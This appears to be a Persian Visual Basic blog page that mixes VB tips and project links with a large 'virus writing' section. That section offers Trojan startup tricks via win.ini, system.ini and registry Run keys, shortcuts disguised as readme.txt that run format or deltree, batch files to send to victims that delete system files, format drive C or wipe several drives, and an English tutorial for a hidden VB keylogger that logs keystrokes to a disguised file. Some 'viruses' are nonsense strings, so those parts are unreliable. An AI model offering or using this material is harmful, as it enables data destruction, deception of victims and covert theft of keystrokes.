آموزش ویژوال بیسیک و برنامه نویسی

سورس,ویژوال بیسیک,نرم افزار,باشگاه,بدنسازی,فوتبال,آنالیز,پیش بینی,کد,برنامه نویسی

آموزش ویژوال بیسیک و برنامه نویسی

سورس,ویژوال بیسیک,نرم افزار,باشگاه,بدنسازی,فوتبال,آنالیز,پیش بینی,کد,برنامه نویسی

ترفندهای هکرها-فایلهایی نظیر win.ini

در این روش می توان فایل را در قسمت C:WindowsStartMenuProgramsstart کپی کرد البته شاخه ها مانند C:Windows متغییر است و بنا به دایرکتری نصب ویندوز شما فرق می کند .

روش 2
فایل Win.ini است ::
این فایل هم قدرت اجرایی دارد . مانند ::
run= trojan
NullPort=None
BaseCodePage=1256

روش 3
استفاده از فایل System.ini می باشد :
اگر شما پیدا کردید کد shell=Explorer.exe trojan.exe زیر را فایل trojan.exe بعد از Explorer.exe اجرا خواهد شد

پسوندهای پنهان فایلهای ویندوز
ممکن است از این موضوع آگاهی نداشته باشید، اما حتی اگر به ویندوز بگویید که تمام پسوندهای فایل را نشان دهد، هنوز هم فایلهایی وجود دارند که بطور پیش فرض مخفی شده‌اند. همچنین هر برنامه نصب شده‌ایی می‌تواند پسوندها را پیکربندی کند تا پنهان شوند. در اینجا در مورد چگونگی انجام این کار و همچنین دلیل اینکه چرا برخی از پسوندهای پنهان می‌توانند برای تعدادی از کاربرهای کامپیوتر خطرناک باشند، مثالهایی آورده شده است. به فرض اینکه شما قبلا ویندوز explorer را برای نشان دادن تمام پسوندهای پیکربندی کرده‌اید.

پسوندهای SHS
یک کپی از notepad.exe بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید. روی notepad.exe کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی notepad.exe کلیک کنید و آن را به عقب به سمت desktop بکشید. فایلی را که ایجاد شده است (Scrap) به Readme.txt تغییر نام دهید.

حالایک آیکن که نشان دهنده سند متنی است و فایلی با نام مشخص readme.txt بر روی desktop شما وجود دارد کلیک کردن بر روی فایل فوق باعث می‌شود notepad باز ‌شود. اگر این فایل یک Trojan باشد، شما فریب خورده‌اید و توسط آنچه که یک فایل متنی بی‌خطر بنظر می‌رسید آلوده شده‌اید. اگر اجازه نمایش این پسوند داده می شد شما فریب فایل Readme.txt.shs را نمی‌خوردید.

پسوندهای PIF
اگر سعی کنید تا notepad.exe را به anything.txt.pif تغییر نام دهید، تنها فایلی با نام anything.txt روی desktop خود خواهید دید. و این بدین دلیل است که PIF پسوند دیگری است که ویندوز بطور پیش فرض پنهان می‌کند. اگر شما فایل را اجرا کنید برنامه اجرا خواهد شد، به خاطر اینکه ویندوز پسوندهای PIF را اجرا خواهد کرد حتی اگر آنها فایلهای اجرایی باشند.

پسوندهای SCR
پسوند دیگری که باید مراقب آن بود SCR است. کپی notepad.exe خود را به notepad.scr تغییر نام دهید و روی آن کلیک کنید. Notepad به عنوان یک فایل اجرایی اجرا خواهد شد. بسیاری از افراد توسط هکرهایی فریب می‌خورند که account یک قربانی را بدست آورده‌اند. هکر email یا هر نوع پیغامی را به تمام دوستان قربانی می‌فرستد که “این صفحه نمایش جدید و بامزه را ببینید از خنده روده بر خواهید شد!” از آنجایی که این پیغام از یک منبع مطمئن آمده، اکثر افراد فریب خورده و فایل SCR را اجرا می‌کنند که در نهایت به هکری ختم می‌شود که به کامپیوتر شما متصل شده است.

فرمانهای خطرناکی که می‌توانند گنجانده شوند
پسوندهای میانبر PIF
برخی از پسوندهای پنهان فایل قادرند به سادگی با فرمانهای پنهان شده‌ای که می‌توانند برای سیستم شما مخرب باشند برنامه‌ریزی شوند. این یک آزمایش ساده است:

دکمه راست ماوس خود را روی desktop کلیک کنید و New و سپس Shotcut را انتخاب نمایید. در Command line تایپ کنید:
format a:/autotest
Next را کلیک کنید. در “Select a name for the shortcut” تایپ کنید: readme.txt سپس Next را کلیک کنید. یک آیکن notepad را انتخاب کرده و Finish را کلیک کنید. حالا شما در desktop خود فایلی با نام readme.txt و با آیکن notepad دارید. مطمئن شوید که در درایو شما دیسکی است که از دست دادن آن برای شما اشکالی ندارد و روی آیکن کلیک کنید. فایلی که شما روی آن کلیک کرده‌اید درایو A: را فرمت خواهد کرد. البته آیکن هکر درایو دیگری را مورد هدف قرار خواهد داد یا ممکن است نامی همچون ‘game.exe’ و فرمانی برای حذف کردن دایرکتوری ویندوز شما یا (deltree /y C:\*.*) کل درایو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فریب شما نخواهد بود.

پسوند SHS
فایلهای Scrap نیز می‌توانند فرمانهای گنجانده شده را پنهان کند. این یک آزمون ساده است: از notepad.exe یک کپی بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید.Notepad.exe را کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی Edit کلیک کنید و Package Object و سپس Edit package را انتخاب کنید. روی Edit و سپس Command Line کلیک کنید.
در کادر، دستوری مانند format a:/autotest را تایپ کنید و روی OK کلیک کنید. آیکن نیز می‌تواند از این پنجره تغییر یابد. از پنجره خارج شوید، این کار سند را به روز خواهد کرد. روی notepad.exe کلیک کنید و آن را به عقیب به سمت Desktop بکشید. فایلی را که ایجاد شده (Scrap) به Readme.txt تغییر نام دهید.

حالا شما آنچه را که شبیه یک فایل متنی است دارید. اگر این فایل اجرا شود درایو A: را فرمت خواهد کرد. همانگونه که در مثال بالا برای پسوندهای میانبر PIF دیده شد، هکر می‌تواند از فرمانهای خطرناکتری استفاده کند.

روشهای Trojan در هنگام راه اندازی
روشهای راه اندازی استاندارد
اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده می‌کنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راه‌اندازی خواهد داشت، بگونه‌ای که در زمان راه‌اندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راه‌اندازی شامل کلیدهای اجرایی registry، فولدر راه اندازی ویندوز، Windows Load= یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز می‌باشند.

روشهای راه اندازی خطرناک
از آنجایی که فقط تعداد اندکی از این روشهای راه اندازی وجود دارند، هکرهای زیادی را یافته‌ایم که در پیدا کردن روشهای جدید راه‌اندازی افراط می‌کنند. این شامل استفاده از تغییرات خطرناکی در سیستم registry می‌باشد، که در صورتی که فایل Trojan یا فایل همراه آن از بین برود سیستم را بصورت بلااستفاده درخواهد آورد. این یک دلیل استفاده نکردن از نرم افزار ضد ویروس برای از بین بردن Trojanهاست. اگر یکی از این روشها استفاده شود، و فایل بدون ثابت کردن registry سیستم از بین برود، سیستم شما قادر به اجرای هیچگونه برنامه‌ای پس از راه اندازی مجدد کامپیوترتان نخواهد بود.
قبل از آنکه سراغ registry برویم لازم به توضیح است که یک فولدر به صورت C:\WINDOWS\StartMenu\Program\StartUp وجود دارد که هر فایلی در اینجا باشد هنگام راه اندازی ویندوز اجرا خواهد شد.توجه داشته باشید که هرگونه تغییری می‌تواند سیستم شما را به خطر بیاندازد بنابراین، هرچه ما می‌گوییم انجام دهید. برای دستیابی به registry به منوی start>run> بروید و “regedit” را بدون علامت ” ” تایپ کنید. در registry چندین مکان برای راه اندازی Startup وجود دارد که لیستی از آنها را در اینجا می آوریم.

[HKEY_CLASSES_ROOT\exefile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\comfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]=”\”%1\” %*”
[HKEY_CLASSES_ROOT\piffile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command]=”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command]=”\”%1\”%*”
اگر این کلیدها مقدار “\”%1\”%*” را نداشته باشند و به جای اجرای فایل در هنگام راه اندازی به “\”Server.exe %1\” %*” تغییر یابد به احتمال زیاد یک Trojan است.
روش راه اندازی ICQ
روشی راه اندازی دیگری که امروزه استفاده از آن معمول است شناسایی شبکه ICQ می‌باشد. بسیاری از کاربران ICQ نمی‌دانند که هکر می‌تواند یک خط پیکربندی را به ICQ اضافه نماید تا با هر بار بارگذاری شدن برنامه Trojan نیز راه اندازی شود. به عنوان آزمایش مراحل زیر را انجام دهید:
ICQ را باز کنید. روی آیکن ICQ کلیک کنید و preference را انتخاب نمایید. روی Edit launch List کلیک کنید. روی Add کلیک کنید. روی Browse کلیک کنید. فایلی را برای اضافه کردن به Windows\notepad.exe بیابید که به کار این آزمایش بیاید. روی Open و سپس OK کلیک کنید. زمانی که شما ICQ را راه اندازی مجدد می‌کنید فایل اجرا خواهد شد.

 

درست کردن پوشه بی نام و نشان:

در این ترفند شما بدون استفاده از Hidden کردن پوشه ای خود را محو کنید!
ابتدا پوشه مورد نظر را انتخاب کنید و بعد کلیک راست کرده و Rename را انتخاب کنین , سپس Alt را نگه داشته و با استفاده از اعداد سمت راست کیبورد عدد 255 را تایپ کنید و Enter را فشار دهید.خواهید دید که پوشه ای مورد نظر بی نام است .
حال روی پوشه ای مورد نظر کلیک راست کرده و Properties را انتخاب کنید از صفحه ای باز شده Customize را انتخاب کنید و بعد روی Chang Icon کلیک کنید و در صفحه ای باز شده یک آیکن بیرنگ انتخاب کنید خواهید دید که پوشه مورد نظر کاملا محو شده است!

آموزش ویروس نویسی

آموزش ساختن ویروس [ویروس نویسی]

 

امروز میخوام آموزش ساختن یه ویروس رو بهتون یاد بدم.

این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان  30  ثانیه کامپیوتر شما رو خاموش میکنه.

برای ساختن این ویروس ابتدا روی صفحه دسکتاب راست کلیک کنید.

سپس new  و بعد از اون text document  رو انتخاب کنید.

سپس وارد این فایل متنی شده و این عبارت رو تایپ کنید.

Shutdown –r

حالا از منوی فایل save as  رو انتخاب کنید.

در قسمت file name  اسم فایل رو مشخص کنید.

توجه کنید که این اسم حتما با پسوند bat  باشه.مثل rockboys.bat

در قسمت encoding  شما باید ANSI  رو انتخاب کنید.

حالا save  کنید.

شما میتونید این فایل رو روی خودتون اجرا کنید و نتیجه کار رو ببینید.

برای اینکه از  خاموش شدن کامپیوترتون جلوگیری کنید  کافیه در قسمت run  عبارت زیر رو تایپ کنید.

Shutdown –a

 

آموزش ساختن بد ترین وآزاردهنده ترین ویروس در دنیا (Blastr&saser) [ویروس نویسی]

1. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید.

2. حالا وارد text document  شوید ودر آن عبارت زیررا تایپ کنید.

cpu_567hjkblaster

3. بعد از سیو کردن آنرا rename   کرده و اسمی برایش انتخاب کنید.

حالا اگه فایل رو اجرا کنید باید فاتحه ی cpu رو بخونین.

 

اینم یه ویروس باحال در win xp : [ویروس نویسی]

یه  Text Document  باز کنید و بعد این کامند رو توش بنویسید :

                                          

:c

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فایل رو با پسوند bat  .سیو کنید.

مثل این : nofooz.bat

این فایل رو وقتی برای  کسی بفرستید هیچی نمیشه  ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .

من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .


 

نوشتن یه ویروس ساده ولی خطرناک [ویروس نویسی]

 این ویروس چیز سختی نیست ولی خیلی خطرناکه.

 اول از همه روی دسکتاپ رایت کلیک کنید بعدش New ShortCut  بسازید.

یه صفحه باز میشه در اون بنویسید: Format C:/Autotest

سپس Next  را زده و در صفحه جدید که باز میشه یه اسم واسه ویروستون انتخاب کنید.

سپس Next  را زده ویه آیکون با سلیقه خودتون برای اون انتخاب کرده و Finish  کنید.

خب دیگه کارمون تمومه حالا اگه اجراش کنین بیچاره میشین.

اگه خواستین بفهمین چی میشه به جای Format C:/autotest  بنویسید

Format a:/autotest  و یه فلاپی که حاوی اطلاعات هستش در Flopy Drive  خود

قرار دهید بعد اجراش کنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی

پاک شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش کرد.

 

ویروسی که شناسایی نمیشه [ویروس نویسی]

سلام دوستان امروز با یه آموزش بسیار خفن اومدم

این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه

برای ساختن این ویروس مراحل زیر رو انجام بدید

به نوت پد رفته و این عبارت رو بنویسید

del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت bat  سیو کنین و برای قربانی بفرستین

 

یک ویروس برای فرمت کردن درایو C شخص مورد نظر [ویروس نویسی]

برنامه NotePad  رو باز کنین بعد فرمان زیر رو توش کپی و پیست کنید:
 

 @echo off
 call attrib -r -h c:autoexec.bat  >nul
 echo @echo off  >c:autoexec.bat
 echo format /autotest  c:/q>nul  >>c:autoexec.bat
 call attrib +r +h c:autoexec.bat  >nul
 exit


حالا فایل را با پسوند bat  ذخیره کنین. مواظب یاشین که فایل رو اجرا نکنین چون کل اطلاعات درایو سی شما پاک می شه!
 
 این فایل چه کار می کنه؟
 اول کل اطلاعات موجود تو فایل autoexe.bat  رو پاک می کنه بعد کد format /autotest c:/q  رو توش می زاره وقتی هدف شما کامپیوتر رو ریست و دوباره راه اندازی کنه این کد اجرا می شه و درایو سی فرمت می شه!

------------------------

راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با کمی تغییر توی فرمان ها می تونین تعیین کنین

 

آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ویروس نویسی]

خوب اول یک

Notepad  یا همان Txt Document 

باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت

Bat

سیو میکنید...

C:

del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini 

مثل:

Virus.bat

به جای کلمه ویروس هم اسم مورد نظر را بگذارید...

**************************************************

آموزش ساخت ویروس های قوی و کشنده .

1=ویروس خطرناک
cpu-567njkblaster بعد با پسوند bat. سیو کنید.
خطر: یک بار هم روی سیستم خودتون امتحان نکنید.
ویروس graphic card lower :
توضیح در باره ویروس: این ویروس فضای کارت گرافیک رو پر میکنه و دیگه هیچ بازی رو سیستم اجرا نمیشه. نت پد رو باز کنید و در آن تایپ کنید :
c/windows/system32/jefo/display/memory/full
و برای save کردنش گزینه file رو زده و save as... رو انتخاب کنید و اونو با اسم XXX.bat ذخیره کنید اکنون ویروس شما آماده میباشد

________________________________________
2=ساخت ویروس
فکر می کنم همه شما ویروس Blaster رو بشناسید (ویروسی که باعث Shutdown شدن کامپیوتر تو 60 ثانیه می شد و می شه) و حتی خیلی از شما روش ساخت اون را بدونید ولی لازم میدونم نگاهی سریع به اون بندازم.
این ویروس رو به طریق مختلفی و با دستورات گوناگونی می شه نوشت که در این جا دو روش رو مورد بررسی قرار میدیم
اگر از این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده کنید.
روش اول
با استفاده از Shortcut : در جایی از دسکتاپ خود کلیک راست کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از دستورات زیر را وارد کنید:
1)shutdown -s -t xx
2)%windir%system32shutdown.exe -s -t xx
توضیح: بعد از اینکه Paste کردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا کامپیوتر پس از آن زمان خاموش شود.
سپس Next را بزنید و برای فایل خود یک نام برگزینید و کار تمام است.
روش دوم
به کمک Notepad : نت پد را باز کنید و باز هم یکی از دو دستور بالا را در آن Paste کنید و حالا فایل خود را با پسوند bat یعنی با نامی مثل shutdown.bat سیو کنید. برای پادزهر درست کردن برای این ویروس هم میتوانید از دستور زیر استفاده کنید:
shutdown -a
و همه مراحل قبل را انجام دهید.این دستور هم از هر دو راه فوق قابل اجرا است. حالا میرسیم به نکات تکمیلی در مورد چگونه میتوان برای BatchFile ها آیکون انتخاب کرد. باید بگویم یکی از ساده ترین روشها که به هیچ نرم افزار خاصی نیاز ندارد این است که شما از BatchFile مورد نظر یک Shortcut بسازید و برای Shortcut براحتی آیکون انتخاب کنید و فایل اصلی را Hidden کنید.
تا به حال هیچ به این فکر افتاده اید که اگر در کامپیوتری Notepad و Wordpad و Microsoft Word نصب نشده باشد شما این همه ترفند را کجا میخواهید پیاده کنید. آیا میدانید هکرها معمولا در محیط متنی دیگری بجز اینها اقدام به نوشن برنامه میکنند؟ بله این محیط متنی به نسبت ناشناخته همان ادیتور داس (Dos Editor) است. شما در این ادیتور میتوانید کد برنامه ها را ببینید. برای وارد شدن به این محیط وارد داس شوید و تایپ کنید Edit. صبر کنید. قبل از اینکه وارد این محیط شوید باید بدانید بر خلاف محیط بی آزار نت پد محیط Dos Editor بسیار بسیار خطرناک است. هرگونه تغییری که خواسته یا ناخواسته در متن کد ها بوجود آورید امکان هیچگونه بازگشت ندارد (اینجا از کلیدی به نام Undo خبری نیست.) همچنین همه تغییرات بطور خودکار سیو میشود و هیچگاه موقع خروج از ادیتور ازشما سوال نمیشود که Do you want to save changes و همه چیز بطور خودکار ذخیره شده و اگر احیانا کد فایل های اصلی سیستم را دستکاری کنید حتی System Restore و Backup های رجیستری هم به دادتان نخواهند رسید

________________________________________
شبه ویروس
اگه ویندوز 98 دارید برید تو Run و تایپ کنید Con/Con : چیزى که مشاهده خواهید کرد همون صفحه آبى رنگ ویندوز! هیچ چاره اى جر restart کردن رو براتون باقى نمی گذاره.حالا چه جورى می تونیم از این باگ که در ویندوز98 موجود است استفاده کنیم.یکى از راهاش اینه که در یک صفحه اینترنت این دستور را وارد کنیم که این فایل را از کامپیوتر فراخوانى کند بدین صورت file:///c:/con/con می توانید از این باگ یه فایل درست کنید که وقتى کسى این فایل رو اجرا کرد هر بار که کامپیوترش این فایل فراخوانى بشه و راهى بجز فرمت رو براش پیش رو نگذاره یه صفحه یtxt باز کنید و این دستورات رو توش بنویسید و با پسوند .REG سیو کنید
windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\Curr entVersion\Run]
@="c:\\con\\con"
این باعث میشه که باهر بار ریستارت کردن کامپیوتر این دستور اجرا بشه و نهایتا همون صفحه آبى رنگ بیاد که راهى جز restart کردن نداره.اگر ویندوز NT /200 / XP می توانید یه کار دیگه بکنید یه صفحه یtxt ‌‌باز کنید بعد این کامند ها رو بتوش بنویسید
c:
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد فایل رو با پسوند .BAT سیو کنید. این فایل رو وقتى براى کسى بفرستید هیچى نمی شه اما به محض اینکه کامپیوتر رو restart کنه دیگه بار بعدی بالا نمیاد.

________________________________________
آموزش ویروس نویسی
این ویروس بسیار خطرناک است چون با اجرا شدن آن دیگر برای قربانی راهی جز اف دیسک کردن کامپیوتر باقی نمی ماند. مواظب باشید اشتباها روی آن دابل کلیک نکنید.

هرگونه استفاده غیر متعارف از این ویروس به عهده کاربر می باشد.

متن ویروس:

ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\

در مین یابی همیشه موفق باشید!

 

بازی مین روب یا Minesweeper چندین سال است که همراه ویندوز به عنوان یک بازی محبوب ارائه می شود. اگر شما نیز به این بازی علاقمند هستید و می خواهید همیشه در آن پیروز باشید، مراحل زیر را طی کنید:

1- وارد بازی Minesweeper شوید.
2-
عبارت xyzzyرا در حالی که پنجره Minesweeper فعال است ، تایپ کنید و کلیدهای Shift + Enterرا فشار دهید.
3-
تمامی پنجره های دیگر را Minimize کنید تا Desktop ویندوز را مشاهده کنید.

خوب حالا شروع به بازی کنید .زمانی که نشانگر ماوس را روی خانه ای می آورید که دارای مین است ، نقطه ای کوچک در گوشه بالا و سمت چپ دسک تاپ سیاه می شود و زمانی که ماوس را روی یک خانه امن ببرید، همان نقطه سفید می شود.
با این روش می توانید دوستان خود را حیرت زده کنید زیرا این نقطه کوچک توجه کمتر کسی را به خود جلب میکند.

 

پروژه های اماده برای تمرین

 

ترفنـــــــــــــــــــــــــــد:

برای اینکه بعد از قرار دادن کنترل هاتون نخواید دوباره فونت تک تک اونها رو تغییر بدهید برای این کار قبل از قرار دادن اونها روی فرم ابتدا فونت فرم رو به فونت مورد نظرتون که من Tahoma رو پیشنهاد میکنم تغییر بدهید و سپس هر کنترلی که روی فرم قرار بدهید با فونت فرم یکی میشود

نکتـــــــــــــــــــــــــــــه:

برای حرکت دادن کنترل های رو فرم به صورت دقیق تر و بدون لرزش میتونید این کار رو با کیبرد انجام بدهید که فقط روی کنترل مورد نظر کلیک کنید و سپس کلید کنترل رو پایین نگه دارید و با کلید های مکان نما اون رو جابجا کنید که این کار رو می تونید با انتخاب دسته جمعی کنترل ها هم انجام بدهید

نکتـــــــــــــــــــــــــــــه:

برای تغییر اندازه کنترل های روی فرم میتونید ابتدا انها را انتخاب کنید و سپس کلید شیفت رو پایین نگه دارید و با کلید های مکان نما اونها رو تغییر اندازه بدهید

نکتـــــــــــــــــــــــــــــه:

بعضی مواقع شما نوشته داخل یک کنترل مثل یک Label رو به فارسی تغییر میدهید که این عبارت به درستی نشان داده نخواهد شد که برای رفع این مشکل باید فونت اون کنترل رو به Tahoma تغییر دهید

نکتـــــــــــــــــــــــــــــه:

برای اینکه در پنجره خصوصیت اشیاء سریعتر به خصوصیت مورد نظر پرش کنید میتوانید با نگه داشتن کلید کنترل و شیفت و زدن اولین حرف خصوصیت مورد نظر به ان پرش کنید

برنامه نمونه مشاور املاک(درخواستی)

دیجیتال

DNS

کدهای اماده برای کار های مختلف

بخش اول ویژوال بیسیک شبیه سازی شده(انگلیسی)  بخش دوم  بخش سوم

اقای Hacker alone ( درخواستی)

برنامه جالب سه بعدی

فارسی ساز ویژوال بیسیک ( در فایل متنی داخلش توضیح دادم ) بخش اول

پسوردش هم : VBLog.blogfa است حتمــــــــــــــــــــــــا دانلود کنید هر بخش ۱۵۰ کیلو بایت است

بخش دوم  بخش سوم  بخش چهارم  بخش پنجم  بخش ششم  بخش هفتم بخش هشتم بخش نهم

پنجره شناور (اقا کمال) قسمتی از وی بی 

فکس با وی بی

فکر و بکر

جستجوی دیتا بیس

پر کننده گرافیکی

اکواریــــــــــــــــــــــــــــــــم

جالبــــــــــــــــــــــــــــــــه

توابــــــــــــــــــــــــــع

پنجره شفاف

پنجره شفاف 2

محاسبه کننده زمان توقف موس

مبدل تصاویر

جلوه دهنده تصاویر

قفل کننده پوشه ها

ماتریکس برای بچه های مهندسی و ریاضی

حرکت دهنده موس

برش دهنده تصاویر

پین باتون

پینگ

پینگ ای پی

Trace

طیف نما برای کارهای مولتی مدیا جالب

بک گراند Fifa برای جام جهانی 2010 خودم طراحی کردم

شبیه سازی قسمت معلولین ویندوز

اموزش Active X

سرعت سنج اینترنت خیلی جالبه

جستجو در بین پوشه ها

یک Progress bar کاربردی و جالب

یک بوتر به همراه فایل اجرایش

باز کردن Combo box با زدن اینتر

اعداد مختلط

کپی فایل به همراه نوار پیشرفت

فهرست کشورهای جهان برای شما

متوقف کردن برنامه در تاریخ معین شده

تبدیل Fat32 به Ntfs

دیوار اتش با VB

تبدیل فوریه برای بچه های الکترونیک و ریاضی

تبدیل عکس به متن

برنامه نمونه کار با پورت

پیانو

یک نمونه کوچک از برنامه خودم(وی بی فارسی)(اقا کمال)

اموزش برنامه نویسی Socket Programing

یک نمونه کوچک از برنامه خودم (نوار مرزی)

یافتن متن

تبدیل متن به عکس

تبدیل کدهای وی بی به دلفی

شبیه سازی یک قسمت از Nero ( نمایش طیفی فایل صوتی)

کاوشگر اینترنت

یک فرم رو توی یک فرم دیگه

تنها با دو خط کد میتونید جلوه ای رو بوجود بیارید که فکرشم نمی کردید. یک فرم رو توی یک فرم دیگه جابدید. استفاده های زیادی میشه ازش کرد. مثلا ساخت نوار ابزارهایی مثل اونی که فتوشاپ داره. راجع بهش فکر کنید
این هم کدش

Private Declare Function SetParent Lib "user32" ( _
ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long

Private Sub Form_Load()
SetParent Form2.hWnd, hWnd
Form2.Show
End Sub

با این تابع می تونید آیکون های روی دسکتاپ رو مخفی و ظاهر کنید

اول فراخوانی توابع

Option Explicit
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hWnd As Long, ByVal nCmdShow As Long) As Long

بعد سه تا کامند برای ظاهر کردن آیکون ها مخفی کردن آنها و خروج از فرم بنویسید

کد هر کدام اینطور است

Private Sub cmdDHide_Click()
Dim hWnd As Long
hWnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hWnd, 0
End Sub'--------------------------------
Private Sub cmdDShow_Click()
Dim hWnd As Long
hWnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hWnd, 5
End Sub'---------------------------------
Private Sub cmdExit_Click()
Me.Hide
End
End Sub'-------------------------------------

تعداد مشخص اجرا

شرح برنامه : می خواهیم برنامه ای بنویسیم که دارای تعداد مشخص اجرا باشد . یعنی کاربر فقط بتواند پنج بار این برنامه را اجرا کند و در هر بار اجرای آن پیغامی مبنی بر تعداد باقیمانده دفعات اجرا برای کاربر نمایش داده شود و هنگامی که این تعداد به پایان رسید پیغامی نمایش داده شود که دیگر کاربر نمی تواند این برنامه را اجرا نماید . مانند برنامه هایی که دارای قفل یا به اصطلاح رجیستری هستند .

_ برای این کار شما فقط کافی است کدهای زیر را در Form_Load برنامه خود قرار دهید :

()Private Sub Form_Load
Dim RunCount As String
( "RunCount = GetSetting("Test", "Setting", "RunCount
If Val(RunCount) > 5 Then

_,"مهلت اجرای برنامه به پایان رسیده و شما دیگر قادر به اجرای آن نخواهید بود"MsgBox vbExclamation , "اتمام مهلت"

End
Else

_ ,"شما فقط " & ((Str(4 - Val(RunCount & " بار دیگر می توانید این برنامه را اجرا کنید" MsgBox

vbInformation, "تعداد اجرای باقیمانده"

(SaveSetting "Test", "Setting", "RunCount", Str(Val(RunCount) + 1
End If
End Sub

حال فایل exe از برنامه خود بسازید و آن را اجرا نمایید

Creating a KeyLogger in VB

Ok...I am assuming that you have a basic understanding as to how visual basic works and how to make programs, debug, and compile. If not, email me and I might be able to help.

First, if you don't have it, get it. ApiGuide. Download it at http://www.mentalis.org/agnet/apiguide.shtml

Ok. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to Start Logging
(if you want to make it start on startup...pm me or email me)
Now using api guide or just copying from here, declare a new function. the GetASyncKeyState function

Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
(ByVal vKey As Long) As Integer

^---put this in the declarations section of the module.

That is all one line of code. Make sure its like that. and not split in 2.

Now you have a new function to use through your program.
ok...
now we must make it be "invisible". Now im sorry but in Windows XP, i do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.

OK. In the button code..., in the click event of course...
type the following

app.taskvisible = false
form1.visible = false
form1.hide
timer1.enabled = true


'and also in the properties section of the form...change the shownintaskbar to false

Now when we click the button...it goes invisible.

Now we are going to need some variables....
Back in the declarations section declare the following...

Dim strLetter as String, strTotal as String

Now in the timer code put this. Ill explain afterward.
also set the interval to 1 and enabled to false

Private Sub Timer1_Timer()

For I = 28 To 128

If GetAsyncKeyState <> 0 Then

strLetter = Chr(I)


'Now here you can add certain things
'so that instead of displaying
'retarded characters, it tells you
'what the user pressed. What I mean
'is if they press Enter/Return, it will
'Show some weird box. You dont want that
'so u make a select case about I for each
'button u want to customize. PM me or Email
'me for help on this part.


strTotal = strTotal & strLetter


End If

Next I

open "C:\Windows\SysResources.DAT" for output as #1
Print #1, strTotal
close #1

End Sub


'End Code

Now all you have to do is when you want to check the keys pressed, open up C:\Windows\SysResource.DAT in notepad, and there it is. This program will not run on start up. If you want to know how to do that, PM me, but preferably email me. I would much rather have you add me to Msn Messenger. My email for messenger is... Black_viper_13@hotmail.com
My email for emailing is..... Anarchist_ninja_thief@hotmail.com.

Hope this helps!
Here is the entire coding for the lamers...

'BEGINNING

Dim strLetter As String, strTotal As String, old as string

Private Sub Command1_Click()
Timer1.Enabled = True
End Sub

Private Sub Form_Load()
Command1.Caption = "Start Loggin"
Timer1.Enabled = False
Timer1.Interval = 1
End Sub

Private Sub Timer1_Timer()
For I = 28 To 128 'ASCII code
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
End If
If strletter <> Old Then
Old = strletter
strTotal = strTotal & old
End If
Next I
Open "C:\windows\SysResources.dat" For Output As #1
Print #1, strTotal
Close #1
End Sub

'ENDING

i think thats it besides the Module of course.

مجموعه ای از کاربردی ترین دستورات برای ویروس نویسی

مجموعه ای از کاربردی ترین دستورات برای برنامه نویسی

